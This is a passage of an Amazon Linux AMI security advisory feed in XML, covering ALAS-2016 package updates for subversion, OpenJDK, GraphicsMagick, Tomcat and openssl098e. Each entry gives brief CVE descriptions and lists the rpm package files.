arch="x86_64"><filename>Packages/subversion-javahl-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.15" release="1.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-python27-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.8.15-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-677</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-677: critical priority package update for java-1.8.0-openjdk java-1.7.0-openjdk</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0636:
An improper type safety check was discovered in the Hotspot component. An untrusted Java application or applet could use this flaw to bypass Java Sandbox restrictions.
1320650:
CVE-2016-0636 OpenJDK: out-of-band urgent security fix (Hotspot, 8151666)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0636" title="" id="CVE-2016-0636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.77-0.b03.9.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.99-2.6.5.0.66.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package 
name="java-1.7.0-openjdk-src" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-678</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-678: medium priority package update for GraphicsMagick</title><issued date="2016-03-30 17:45:00" /><updated date="2016-03-30 17:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8808:
An out-of-bounds read flaw was found in the parsing of GIF files using GraphicsMagick.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8808" title="" id="CVE-2015-8808" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-perl" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.23" release="5.7.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.23-5.7.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.23" release="5.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.23-5.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-679</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-679: medium priority package update for tomcat8</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0763:
The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.
1311093:
CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5351:
The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.
1311076:
CVE-2015-5351 tomcat: CSRF token leak
CVE-2015-5346:
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.
1311085:
CVE-2015-5346 tomcat: Session fixation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5346" title="" id="CVE-2015-5346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5351" title="" id="CVE-2015-5351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0763" title="" id="CVE-2016-0763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-webapps" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-680</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-680: medium priority package update for tomcat7</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0763:
The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.
1311093:
CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5351:
The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.
1311076:
CVE-2015-5351 tomcat: CSRF token leak
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5351" title="" id="CVE-2015-5351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0763" title="" id="CVE-2016-0763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package 
name="tomcat7" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-681</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-681: medium priority package update for tomcat6</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-jsp-2.1-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.45" release="1.4.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-lib-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.45-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-682</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-682: important priority package update for openssl098e</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0800:
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker could potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker can potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
1310593:
CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)
CVE-2016-0704:
It was discovered that the SSLv2 protocol implementation in OpenSSL did not properly implement the Bleichenbacher protection for export cipher suites. An attacker could use an SSLv2 server using OpenSSL as a Bleichenbacher oracle.
1310814:
CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers
CVE-2016-0703:
It was discovered that the SSLv2 servers using OpenSSL accepted SSLv2 connection handshakes that indicated non-zero clear key length for non-export cipher suites. An attacker could use this flaw to decrypt recorded SSLv2 sessions with the server by using it as a decryption oracle.
1310811:
CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2
CVE-2015-3197:
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that were disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that have been disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
1301846:
CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers
CVE-2015-0293:
A denial of service flaw was found in the way OpenSSL handled certain SSLv2 messages. A malicious client could send a specially crafted SSLv2 CLIENT-MASTER-KEY message that would cause an OpenSSL server that both supports SSLv2 and enables EXPORT-grade cipher suites to crash.
A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. A remote attacker could use this flaw to cause a TLS/SSL server using OpenSSL to exit on a failed assertion if it had both the SSLv2 protocol and EXPORT-grade cipher suites enabled.
1202404:
CVE-2015-0293 openssl: assertion failure in SSLv2 servers
